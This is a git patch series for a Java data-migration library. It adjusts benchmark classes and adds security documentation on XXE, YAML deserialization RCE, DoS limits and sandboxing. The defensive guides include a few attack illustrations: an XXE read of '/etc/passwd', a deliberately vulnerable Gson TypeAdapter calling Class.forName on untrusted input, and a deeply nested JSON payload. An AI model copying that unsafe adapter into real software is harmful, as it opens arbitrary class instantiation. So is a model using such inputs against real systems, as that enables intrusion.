@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class CrossFormatBenchmark {
+public class CrossFormatBenchmark {
/**
* Payload size parameter controlling test data complexity.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
index 7cb3e74..1a87c58 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
@@ -44,6 +44,7 @@
import org.openjdk.jmh.annotations.Setup;
import org.openjdk.jmh.annotations.State;
import org.openjdk.jmh.annotations.Warmup;
+import org.jetbrains.annotations.Nullable;
import org.openjdk.jmh.infra.Blackhole;
import java.util.concurrent.TimeUnit;
@@ -149,7 +150,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class JsonBenchmark {
+public class JsonBenchmark {
/**
* Field name used for read/write benchmarks.
@@ -197,6 +198,7 @@ public final class JsonBenchmark {
*
May be {@code null} if no dedicated Jackson fixer is configured.
* In that case, cross-format migration behavior is measured instead.
*/
+ @Nullable
private DataFixer jacksonFixer;
/**
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
index 675e4eb..2dc134c 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
@@ -150,7 +150,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class TomlXmlBenchmark {
+public class TomlXmlBenchmark {
/**
* Field name used for read/write benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
index 3e9009f..c0f2862 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
@@ -147,7 +147,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class YamlBenchmark {
+public class YamlBenchmark {
/**
* Field name used for read/write benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
index e3b635e..19a93cc 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
@@ -86,8 +86,7 @@
*
Testkit integration: Uses {@link TestDataBuilder} for fluent,
* type-safe data construction
*
Format agnostic: Works with any DynamicOps (Gson, Jackson, YAML, etc.)
- *
Deterministic: Generated data is reproducible for benchmark consistency
- * (except timestamp fields)
+ *
Deterministic: Generated data is fully reproducible for benchmark consistency
*
Configurable complexity: {@link PayloadSize} controls data volume
*
*
@@ -112,6 +111,14 @@
*/
public final class BenchmarkDataGenerator {
+ /**
+ * Fixed timestamp value used for deterministic benchmark data generation.
+ *
+ *
Using a constant timestamp ensures reproducible benchmark results
+ * across different runs, eliminating variability from system time.
+ */
+ private static final long FIXED_TIMESTAMP = 1704067200000L; // 2024-01-01 00:00:00 UTC
+
/**
* Private constructor to prevent instantiation.
*/
@@ -292,7 +299,7 @@ public static Dynamic generateFlat(@NotNull final DynamicOps ops,
*
*
{@code level} - the current nesting depth
*
{@code data} - a string identifying the nesting level
- *
{@code timestamp} - current system time (for data variation)
+ *
{@code timestamp} - fixed timestamp for reproducibility
*
{@code child} - the next nested level (if depth > 0)
*
*
@@ -310,7 +317,7 @@ private static void addNestedObject(final TestDataBuilder builder,
builder.putObject(key, nested -> {
nested.put("level", depth);
nested.put("data", "nested-level-" + depth);
- nested.put("timestamp", System.currentTimeMillis());
+ nested.put("timestamp", FIXED_TIMESTAMP);
addNestedObject(nested, "child", depth - 1);
});
}
From f9df5c1391ba3ddc6cfe8e9ae3a4df5c57436999 Mon Sep 17 00:00:00 2001
From: Erik
Date: Sat, 31 Jan 2026 22:02:18 +0100
Subject: [PATCH 26/39] Add security considerations and best practices for
processing XML and YAML, including examples and detailed mitigations against
XXE and RCE vulnerabilities. Introduce new security documentation sections
for serialization formats and updated threat model.
---
docs/README.md | 10 +
docs/codec/xml.md | 32 +
docs/codec/yaml.md | 26 +
docs/security/best-practices.md | 492 +++++++++++++
docs/security/format-considerations/gson.md | 309 +++++++++
docs/security/format-considerations/index.md | 105 +++
.../security/format-considerations/jackson.md | 328 +++++++++
.../format-considerations/snakeyaml.md | 316 +++++++++
docs/security/index.md | 118 ++++
.../security/secure-configuration-examples.md | 513 ++++++++++++++
docs/security/spring-security-integration.md | 649 ++++++++++++++++++
docs/security/threat-model.md | 278 ++++++++
12 files changed, 3176 insertions(+)
create mode 100644 docs/security/best-practices.md
create mode 100644 docs/security/format-considerations/gson.md
create mode 100644 docs/security/format-considerations/index.md
create mode 100644 docs/security/format-considerations/jackson.md
create mode 100644 docs/security/format-considerations/snakeyaml.md
create mode 100644 docs/security/index.md
create mode 100644 docs/security/secure-configuration-examples.md
create mode 100644 docs/security/spring-security-integration.md
create mode 100644 docs/security/threat-model.md
diff --git a/docs/README.md b/docs/README.md
index 482fbf0..700ede5 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -123,6 +123,16 @@ For experienced users:
- [Performance Optimization](advanced/performance-optimization.md)
- [Extending the Framework](advanced/extending-framework.md)
+### Security
+
+Guidance for processing untrusted data safely:
+
+- [Security Overview](security/index.md) — Introduction to security considerations
+- [Threat Model](security/threat-model.md) — Attack vectors and trust boundaries
+- [Format Security](security/format-considerations/index.md) — Per-format security guidance
+- [Best Practices](security/best-practices.md) — Secure configuration patterns
+- [Secure Configuration Examples](security/secure-configuration-examples.md) — Ready-to-use examples
+
### Spring Boot Integration
Seamlessly integrate Aether Datafixers into Spring Boot applications:
diff --git a/docs/codec/xml.md b/docs/codec/xml.md
index c50d77c..35e14cd 100644
--- a/docs/codec/xml.md
+++ b/docs/codec/xml.md
@@ -338,6 +338,38 @@ DataResult result = ServerConfig.CODEC.decode(JacksonXmlOps.INSTAN
ServerConfig config = result.getOrThrow();
```
+## Security Considerations
+
+> **WARNING:** XML processing is vulnerable to **XXE (XML External Entity)** attacks.
+> When processing untrusted XML, you **MUST** configure the `XmlMapper` to disable
+> external entity processing.
+
+**XXE attacks can:**
+- Read local files (`file:///etc/passwd`)
+- Perform Server-Side Request Forgery (SSRF)
+- Cause Denial of Service through entity expansion (Billion Laughs)
+
+**Secure configuration for untrusted XML:**
+
+```java
+XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+xmlInputFactory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+XmlMapper secureMapper = XmlMapper.builder(
+ XmlFactory.builder()
+ .xmlInputFactory(xmlInputFactory)
+ .build()
+).build();
+
+JacksonXmlOps secureOps = new JacksonXmlOps(secureMapper);
+```
+
+For detailed security guidance and configuration examples, see [Jackson XML Security](../security/format-considerations/jackson.md#xxe-prevention).
+
+---
+
## Best Practices
1. **Use Simple Structures** - Jackson XML works best with simple, well-structured XML
diff --git a/docs/codec/yaml.md b/docs/codec/yaml.md
index 33f997f..3ef29e4 100644
--- a/docs/codec/yaml.md
+++ b/docs/codec/yaml.md
@@ -132,6 +132,32 @@ Yaml yaml = new Yaml(new SafeConstructor(loaderOptions));
Object data = yaml.load(untrustedYaml);
```
+## Security Considerations
+
+> **WARNING:** When loading YAML from untrusted sources, you **MUST** use `SafeConstructor`
+> to prevent arbitrary code execution attacks. The default `Yaml()` constructor allows
+> instantiation of arbitrary Java classes, which can lead to **Remote Code Execution (RCE)**.
+
+**Critical security measures for untrusted YAML:**
+
+1. **Always use `SafeConstructor`** — Prevents arbitrary class instantiation
+2. **Limit alias expansion** — Set `maxAliasesForCollections` to prevent Billion Laughs attacks
+3. **Limit nesting depth** — Set `nestingDepthLimit` to prevent stack overflow
+4. **Limit input size** — Set `codePointLimit` to prevent memory exhaustion
+
+```java
+// Secure configuration for untrusted YAML
+LoaderOptions options = new LoaderOptions();
+options.setMaxAliasesForCollections(50);
+options.setNestingDepthLimit(50);
+options.setCodePointLimit(3 * 1024 * 1024);
+options.setAllowDuplicateKeys(false);
+
+Yaml safeYaml = new Yaml(new SafeConstructor(options));
+```
+
+For detailed security guidance, see [SnakeYAML Security](../security/format-considerations/snakeyaml.md).
+
### Data Types
SnakeYamlOps works with native Java types:
diff --git a/docs/security/best-practices.md b/docs/security/best-practices.md
new file mode 100644
index 0000000..dc04f4a
--- /dev/null
+++ b/docs/security/best-practices.md
@@ -0,0 +1,492 @@
+# Security Best Practices
+
+This document provides general security best practices for processing untrusted data with Aether Datafixers. These practices apply across all serialization formats.
+
+## Defense in Depth
+
+Security should be implemented in layers. No single control is sufficient—combine multiple measures:
+
+1. **Input Validation** — Check size and format before parsing
+2. **Safe Parser Configuration** — Use security-hardened parser settings
+3. **Resource Limits** — Enforce depth, size, and time limits
+4. **Monitoring** — Log and alert on suspicious activity
+5. **Sandboxing** — Isolate high-risk processing
+
+---
+
+## Input Validation Before Migration
+
+### Size Validation
+
+Always validate input size before parsing:
+
+```java
+public class InputValidator {
+
+ private static final long MAX_PAYLOAD_SIZE = 10 * 1024 * 1024; // 10MB
+
+ public void validateSize(byte[] input) {
+ if (input == null) {
+ throw new IllegalArgumentException("Input cannot be null");
+ }
+ if (input.length > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Payload size " + input.length + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+ }
+ }
+
+ public void validateSize(String input) {
+ if (input == null) {
+ throw new IllegalArgumentException("Input cannot be null");
+ }
+ if (input.length() > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Payload size " + input.length() + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+ }
+ }
+
+ public void validateSize(InputStream input, long contentLength) {
+ if (contentLength > MAX_PAYLOAD_SIZE) {
+ throw new PayloadTooLargeException(
+ "Content-Length " + contentLength + " exceeds maximum " + MAX_PAYLOAD_SIZE);
+ }
+ }
+}
+```
+
+### Size-Limited InputStream
+
+For streaming scenarios, wrap the input stream:
+
+```java
+public class SizeLimitedInputStream extends FilterInputStream {
+
+ private final long maxSize;
+ private long bytesRead = 0;
+
+ public SizeLimitedInputStream(InputStream in, long maxSize) {
+ super(in);
+ this.maxSize = maxSize;
+ }
+
+ @Override
+ public int read() throws IOException {
+ int b = super.read();
+ if (b != -1) {
+ bytesRead++;
+ checkLimit();
+ }
+ return b;
+ }
+
+ @Override
+ public int read(byte[] b, int off, int len) throws IOException {
+ int n = super.read(b, off, len);
+ if (n > 0) {
+ bytesRead += n;
+ checkLimit();
+ }
+ return n;
+ }
+
+ private void checkLimit() throws IOException {
+ if (bytesRead > maxSize) {
+ throw new IOException("Input exceeds maximum size of " + maxSize + " bytes");
+ }
+ }
+}
+
+// Usage
+InputStream limited = new SizeLimitedInputStream(userInput, 10 * 1024 * 1024);
+Object data = yaml.load(limited);
+```
+
+---
+
+## Depth and Nesting Limits
+
+Deep nesting can cause stack overflow or excessive memory consumption.
+
+### Parser-Level Limits (Preferred)
+
+Use built-in parser limits when available:
+
+```java
+// Jackson
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+ .maxNestingDepth(50)
+ .build();
+
+// SnakeYAML
+LoaderOptions options = new LoaderOptions();
+options.setNestingDepthLimit(50);
+```
+
+### Application-Level Validation
+
+For parsers without built-in limits, validate after parsing:
+
+```java
+public class DepthValidator {
+
+ private static final int MAX_DEPTH = 50;
+
+ public void validateDepth(Dynamic> dynamic) {
+ validateDepth(dynamic, 0);
+ }
+
+ private void validateDepth(Dynamic> dynamic, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("Data exceeds maximum depth of " + MAX_DEPTH);
+ }
+
+ // Check map entries
+ dynamic.getMap().result().ifPresent(map -> {
+ map.values().forEach(value -> validateDepth(value, depth + 1));
+ });
+
+ // Check list elements
+ dynamic.getList().result().ifPresent(list -> {
+ list.forEach(element -> validateDepth(element, depth + 1));
+ });
+ }
+}
+```
+
+---
+
+## Timeout Configuration
+
+Long-running migrations can be exploited for DoS. Implement timeouts:
+
+```java
+import java.util.concurrent.*;
+
+public class TimedMigrationService {
+
+ private final AetherDataFixer fixer;
+ private final ExecutorService executor;
+ private final Duration timeout;
+
+ public TimedMigrationService(AetherDataFixer fixer, Duration timeout) {
+ this.fixer = fixer;
+ this.executor = Executors.newCachedThreadPool();
+ this.timeout = timeout;
+ }
+
+ public TaggedDynamic migrateWithTimeout(
+ TaggedDynamic input,
+ DataVersion from,
+ DataVersion to) throws TimeoutException {
+
+ Future> future = executor.submit(
+ () -> fixer.update(input, from, to)
+ );
+
+ try {
+ return future.get(timeout.toMillis(), TimeUnit.MILLISECONDS);
+ } catch (TimeoutException e) {
+ future.cancel(true);
+ throw new MigrationTimeoutException(
+ "Migration timed out after " + timeout, e);
+ } catch (InterruptedException e) {
+ Thread.currentThread().interrupt();
+ throw new MigrationException("Migration interrupted", e);
+ } catch (ExecutionException e) {
+ throw new MigrationException("Migration failed", e.getCause());
+ }
+ }
+
+ public void shutdown() {
+ executor.shutdown();
+ }
+}
+```
+
+### Virtual Threads (Java 21+)
+
+With Java 21+, use virtual threads for better resource efficiency:
+
+```java
+public class VirtualThreadMigrationService {
+
+ private final AetherDataFixer fixer;
+ private final Duration timeout;
+
+ public VirtualThreadMigrationService(AetherDataFixer fixer, Duration timeout) {
+ this.fixer = fixer;
+ this.timeout = timeout;
+ }
+
+ public TaggedDynamic migrateWithTimeout(
+ TaggedDynamic input,
+ DataVersion from,
+ DataVersion to) throws TimeoutException {
+
+ try (var executor = Executors.newVirtualThreadPerTaskExecutor()) {
+ Future> future = executor.submit(
+ () -> fixer.update(input, from, to)
+ );
+ return future.get(timeout.toMillis(), TimeUnit.MILLISECONDS);
+ } catch (TimeoutException e) {
+ throw new MigrationTimeoutException("Migration timed out", e);
+ } catch (Exception e) {
+ throw new MigrationException("Migration failed", e);
+ }
+ }
+}
+```
+
+---
+
+## Memory Limits
+
+Limit JVM memory to contain resource exhaustion attacks:
+
+```bash
+# Limit heap size
+java -Xmx512m -Xms256m -jar application.jar
+
+# Enable GC logging for monitoring
+java -Xlog:gc*:file=gc.log:time -jar application.jar
+```
+
+### Monitoring Memory During Migration
+
+```java
+public class MemoryMonitor {
+
+    private static final double WARNING_THRESHOLD = 0.8; // 80% of max heap
+
+ public void checkMemoryBeforeMigration() {
+ Runtime runtime = Runtime.getRuntime();
+ long maxMemory = runtime.maxMemory();
+ long usedMemory = runtime.totalMemory() - runtime.freeMemory();
+
+ if ((double) usedMemory / maxMemory > WARNING_THRESHOLD) {
+ // Trigger GC and recheck
+ System.gc();
+ usedMemory = runtime.totalMemory() - runtime.freeMemory();
+
+ if ((double) usedMemory / maxMemory > WARNING_THRESHOLD) {
+ throw new InsufficientMemoryException(
+ "Insufficient memory for migration. Used: " +
+ usedMemory + "/" + maxMemory);
+ }
+ }
+ }
+}
+```
+
+---
+
+## Sandboxing Strategies
+
+For high-risk scenarios, isolate migration processing:
+
+### Process Isolation
+
+Run migrations in a separate process with limited privileges:
+
+```java
+public class ProcessIsolatedMigration {
+
+ public String migrateInSandbox(String input, String bootstrapClass) throws Exception {
+ ProcessBuilder pb = new ProcessBuilder(
+ "java",
+ "-Xmx256m",
+ "-cp", "migration-worker.jar",
+ "com.example.MigrationWorker",
+ bootstrapClass
+ );
+
+ pb.environment().put("JAVA_TOOL_OPTIONS", ""); // Clear environment
+ pb.redirectErrorStream(true);
+
+ Process process = pb.start();
+        process.getOutputStream().write(input.getBytes(StandardCharsets.UTF_8));
+ process.getOutputStream().close();
+
+ if (!process.waitFor(30, TimeUnit.SECONDS)) {
+ process.destroyForcibly();
+ throw new TimeoutException("Migration process timed out");
+ }
+
+        return new String(process.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
+ }
+}
+```
+
+### Container Isolation
+
+Use container limits for production:
+
+```yaml
+# docker-compose.yml
+services:
+ migration-worker:
+ image: migration-service
+ deploy:
+ resources:
+ limits:
+ memory: 512M
+ cpus: '0.5'
+ security_opt:
+ - no-new-privileges:true
+ read_only: true
+```
+
+---
+
+## Defense-in-Depth Checklist
+
+Before processing untrusted data, verify:
+
+### Input Validation
+- [ ] Input size is checked before parsing
+- [ ] Content-Type header matches expected format
+- [ ] Input encoding is validated (UTF-8)
+
+### Parser Configuration
+- [ ] YAML: Using `SafeConstructor`
+- [ ] YAML: Alias limit configured (`maxAliasesForCollections`)
+- [ ] XML: External entities disabled
+- [ ] XML: DTD processing disabled
+- [ ] Jackson: Default typing is NOT enabled
+- [ ] All: Nesting depth limits configured
+
+### Resource Limits
+- [ ] Timeout configured for migration operations
+- [ ] Memory limits set on JVM/container
+- [ ] Rate limiting applied for user requests
+
+### Monitoring
+- [ ] Failed migrations are logged
+- [ ] Large payloads trigger alerts
+- [ ] Timeout events are tracked
+- [ ] Memory usage is monitored
+
+### Error Handling
+- [ ] Errors don't expose internal details
+- [ ] Stack traces are not sent to clients
+- [ ] Sensitive data is not logged
+
+---
+
+## Logging Security Events
+
+Log security-relevant events for monitoring:
+
+```java
+public class SecureMigrationService {
+
+ private static final Logger SECURITY_LOG = LoggerFactory.getLogger("SECURITY");
+
+ public TaggedDynamic migrate(TaggedDynamic input, DataVersion from, DataVersion to) {
+ long startTime = System.currentTimeMillis();
+
+ try {
+ TaggedDynamic result = fixer.update(input, from, to);
+ SECURITY_LOG.info("Migration success: type={}, from={}, to={}, duration={}ms",
+ input.type().id(), from.version(), to.version(),
+ System.currentTimeMillis() - startTime);
+ return result;
+ } catch (SecurityException e) {
+ SECURITY_LOG.warn("Migration blocked: type={}, reason={}",
+ input.type().id(), e.getMessage());
+ throw e;
+ } catch (Exception e) {
+ SECURITY_LOG.error("Migration failed: type={}, error={}",
+ input.type().id(), e.getMessage());
+ throw e;
+ }
+ }
+}
+```
+
+---
+
+## Complete Secure Migration Service
+
+Combining all best practices:
+
+```java
+public class SecureMigrationService {
+
+ private static final Logger LOG = LoggerFactory.getLogger(SecureMigrationService.class);
+ private static final long MAX_SIZE = 10 * 1024 * 1024;
+ private static final int MAX_DEPTH = 50;
+ private static final Duration TIMEOUT = Duration.ofSeconds(30);
+
+ private final AetherDataFixer fixer;
+ private final ExecutorService executor;
+
+ public SecureMigrationService(AetherDataFixer fixer) {
+ this.fixer = fixer;
+ this.executor = Executors.newCachedThreadPool();
+ }
+
+ public TaggedDynamic migrateSecurely(
+ byte[] untrustedInput,
+ DynamicOps ops,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) {
+
+ // 1. Size validation
+ if (untrustedInput.length > MAX_SIZE) {
+ throw new PayloadTooLargeException("Input exceeds " + MAX_SIZE + " bytes");
+ }
+
+ // 2. Parse with safe configuration (format-specific)
+ T parsed = parseSecurely(untrustedInput, ops);
+
+ // 3. Depth validation
+ Dynamic dynamic = new Dynamic<>(ops, parsed);
+ validateDepth(dynamic, 0);
+
+ // 4. Migrate with timeout
+ TaggedDynamic tagged = new TaggedDynamic<>(type, dynamic);
+ return migrateWithTimeout(tagged, from, to);
+ }
+
+ private T parseSecurely(byte[] input, DynamicOps ops) {
+ // Implementation depends on ops type
+ // See format-specific guides
+ throw new UnsupportedOperationException("Implement for specific ops");
+ }
+
+ private void validateDepth(Dynamic> dynamic, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("Exceeds max depth");
+ }
+ dynamic.getMap().result().ifPresent(map ->
+ map.values().forEach(v -> validateDepth(v, depth + 1)));
+ dynamic.getList().result().ifPresent(list ->
+ list.forEach(e -> validateDepth(e, depth + 1)));
+ }
+
+ private TaggedDynamic migrateWithTimeout(
+ TaggedDynamic input, DataVersion from, DataVersion to) {
+ Future> future = executor.submit(
+ () -> fixer.update(input, from, to));
+ try {
+ return future.get(TIMEOUT.toMillis(), TimeUnit.MILLISECONDS);
+ } catch (TimeoutException e) {
+ future.cancel(true);
+ throw new MigrationTimeoutException("Timeout", e);
+ } catch (Exception e) {
+ throw new MigrationException("Failed", e);
+ }
+ }
+}
+```
+
+---
+
+## Related
+
+- [Threat Model](threat-model.md)
+- [Format-Specific Security](format-considerations/index.md)
+- [Secure Configuration Examples](secure-configuration-examples.md)
+- [Spring Security Integration](spring-security-integration.md)
diff --git a/docs/security/format-considerations/gson.md b/docs/security/format-considerations/gson.md
new file mode 100644
index 0000000..bbc497c
--- /dev/null
+++ b/docs/security/format-considerations/gson.md
@@ -0,0 +1,309 @@
+# Gson Security
+
+Gson is a relatively safe JSON library with a minimal attack surface. It does not support polymorphic deserialization by default, making it less susceptible to the deserialization attacks that affect other libraries.
+
+## Overview
+
+| Risk | Severity | Mitigation |
+|-----------------------------|----------|----------------------------------|
+| Large Payload DoS | Medium | Pre-validate size before parsing |
+| Deep Nesting Stack Overflow | Medium | Validate nesting depth |
+| Custom TypeAdapter Risks | Low | Review custom adapters carefully |
+
+## Safe by Default
+
+Unlike Jackson, Gson does **not** support polymorphic deserialization by default:
+
+```java
+// This is SAFE - Gson doesn't instantiate arbitrary classes
+Gson gson = new Gson();
+MyClass obj = gson.fromJson(untrustedJson, MyClass.class);
+```
+
+Gson only deserializes to the explicitly specified type (`MyClass`), not types specified in the JSON payload.
+
+## Potential Risks
+
+### Large Payload DoS
+
+Gson will attempt to parse any JSON regardless of size. Very large payloads can cause memory exhaustion:
+
+```java
+// No built-in size limits
+Gson gson = new Gson();
+// This will try to parse a 1GB JSON string
+JsonElement element = JsonParser.parseString(hugeJson); // Potential OOM
+```
+
+### Deep Nesting Stack Overflow
+
+Deeply nested JSON can cause stack overflow during parsing:
+
+```json
{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":...}}}}}}}}
+```
+
+---
+
+## Secure Configuration
+
+### Pre-Validation Before Parsing
+
+Always validate input before parsing:
+
+```java
+public class SecureGsonParser {
+
+ private static final long MAX_SIZE = 10 * 1024 * 1024; // 10MB
+ private static final int MAX_DEPTH = 50;
+
+ private final Gson gson;
+
+ public SecureGsonParser() {
+ this.gson = new GsonBuilder()
+ .disableHtmlEscaping() // Optional: for data migration
+ .create();
+ }
+
+ public JsonElement parse(String json) {
+ // Validate size
+ if (json.length() > MAX_SIZE) {
+ throw new SecurityException("JSON exceeds maximum size");
+ }
+
+ // Parse
+ JsonElement element = JsonParser.parseString(json);
+
+ // Validate depth
+ validateDepth(element, 0);
+
+ return element;
+ }
+
+ private void validateDepth(JsonElement element, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("JSON exceeds maximum nesting depth");
+ }
+
+ if (element.isJsonObject()) {
+ for (Map.Entry entry : element.getAsJsonObject().entrySet()) {
+ validateDepth(entry.getValue(), depth + 1);
+ }
+ } else if (element.isJsonArray()) {
+ for (JsonElement item : element.getAsJsonArray()) {
+ validateDepth(item, depth + 1);
+ }
+ }
+ }
+}
+```
+
+### Integration with GsonOps
+
+```java
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+
+public class SecureGsonMigration {
+
+ private static final long MAX_SIZE = 10 * 1024 * 1024;
+ private static final int MAX_DEPTH = 50;
+
+ public Dynamic parseSecurely(String json) {
+ // 1. Size validation
+ if (json.length() > MAX_SIZE) {
+ throw new SecurityException("JSON exceeds maximum size");
+ }
+
+ // 2. Parse
+ JsonElement element = JsonParser.parseString(json);
+
+ // 3. Depth validation
+ validateDepth(element, 0);
+
+ // 4. Wrap in Dynamic
+ return new Dynamic<>(GsonOps.INSTANCE, element);
+ }
+
+ private void validateDepth(JsonElement element, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("JSON exceeds maximum nesting depth");
+ }
+
+ if (element.isJsonObject()) {
+ element.getAsJsonObject().entrySet()
+ .forEach(e -> validateDepth(e.getValue(), depth + 1));
+ } else if (element.isJsonArray()) {
+ element.getAsJsonArray()
+ .forEach(e -> validateDepth(e, depth + 1));
+ }
+ }
+}
+```
+
+---
+
+## Streaming Parser for Large Files
+
+For very large files, use Gson's streaming API with validation:
+
+```java
+import com.google.gson.stream.JsonReader;
+
+public class StreamingGsonParser {
+
+ private static final int MAX_DEPTH = 50;
+ private int currentDepth = 0;
+
+ public void parseWithDepthLimit(Reader input) throws IOException {
+ try (JsonReader reader = new JsonReader(input)) {
+ parseValue(reader);
+ }
+ }
+
+ private void parseValue(JsonReader reader) throws IOException {
+ switch (reader.peek()) {
+ case BEGIN_OBJECT -> {
+ checkDepth();
+ currentDepth++;
+ reader.beginObject();
+ while (reader.hasNext()) {
+ reader.nextName();
+ parseValue(reader);
+ }
+ reader.endObject();
+ currentDepth--;
+ }
+ case BEGIN_ARRAY -> {
+ checkDepth();
+ currentDepth++;
+ reader.beginArray();
+ while (reader.hasNext()) {
+ parseValue(reader);
+ }
+ reader.endArray();
+ currentDepth--;
+ }
+ case STRING -> reader.nextString();
+ case NUMBER -> reader.nextDouble();
+ case BOOLEAN -> reader.nextBoolean();
+ case NULL -> reader.nextNull();
+ default -> throw new IllegalStateException("Unexpected token");
+ }
+ }
+
+ private void checkDepth() {
+ if (currentDepth >= MAX_DEPTH) {
+ throw new SecurityException("Maximum nesting depth exceeded");
+ }
+ }
+}
+```
+
+---
+
+## Custom TypeAdapter Security
+
+If you use custom `TypeAdapter` implementations, review them for security:
+
+```java
+// DANGEROUS - Deserializes arbitrary classes
+public class UnsafeTypeAdapter extends TypeAdapter {
+ @Override
+ public Object read(JsonReader in) {
+ String className = in.nextString();
+ return Class.forName(className).newInstance(); // VULNERABLE!
+ }
+}
+
+// SAFE - Only handles known types
+public class SafeTypeAdapter extends TypeAdapter {
+ @Override
+ public MyClass read(JsonReader in) {
+ // Only deserialize to MyClass, not arbitrary types
+ return new MyClass(in.nextString());
+ }
+}
+```
+
+---
+
+## Complete Secure Service
+
+```java
+public class SecureGsonMigrationService {
+
+ private static final long MAX_SIZE = 10 * 1024 * 1024;
+ private static final int MAX_DEPTH = 50;
+
+ private final AetherDataFixer fixer;
+ private final Gson gson;
+
+ public SecureGsonMigrationService(AetherDataFixer fixer) {
+ this.fixer = fixer;
+ this.gson = new GsonBuilder().create();
+ }
+
+ public TaggedDynamic migrate(
+ String untrustedJson,
+ TypeReference type,
+ DataVersion from,
+ DataVersion to) {
+
+ // Validate
+ validateInput(untrustedJson);
+
+ // Parse
+ JsonElement element = JsonParser.parseString(untrustedJson);
+ validateDepth(element, 0);
+
+ // Migrate
+ Dynamic dynamic = new Dynamic<>(GsonOps.INSTANCE, element);
+ TaggedDynamic tagged = new TaggedDynamic<>(type, dynamic);
+ return fixer.update(tagged, from, to);
+ }
+
+ private void validateInput(String json) {
+ if (json == null || json.isEmpty()) {
+ throw new IllegalArgumentException("JSON input cannot be null or empty");
+ }
+ if (json.length() > MAX_SIZE) {
+ throw new SecurityException("JSON exceeds maximum size of " + MAX_SIZE + " bytes");
+ }
+ }
+
+ private void validateDepth(JsonElement element, int depth) {
+ if (depth > MAX_DEPTH) {
+ throw new SecurityException("JSON exceeds maximum depth of " + MAX_DEPTH);
+ }
+ if (element.isJsonObject()) {
+ element.getAsJsonObject().entrySet()
+ .forEach(e -> validateDepth(e.getValue(), depth + 1));
+ } else if (element.isJsonArray()) {
+ element.getAsJsonArray()
+ .forEach(e -> validateDepth(e, depth + 1));
+ }
+ }
+}
+```
+
+---
+
+## Comparison with Jackson
+
+| Feature | Gson | Jackson |
+|--------------------------------|---------------------------|---------------------------------|
+| Polymorphic Deserialization | Not supported by default | Opt-in (dangerous if enabled) |
+| Built-in Size Limits | No | Yes (StreamReadConstraints) |
+| Built-in Depth Limits | No | Yes (StreamReadConstraints) |
+| Attack Surface | Small | Larger |
+| Recommended for Untrusted Data | Yes (with pre-validation) | Yes (with proper configuration) |
+
+---
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [JSON Support](../../codec/json.md)
+- [Secure Configuration Examples](../secure-configuration-examples.md)
diff --git a/docs/security/format-considerations/index.md b/docs/security/format-considerations/index.md
new file mode 100644
index 0000000..1e90c8c
--- /dev/null
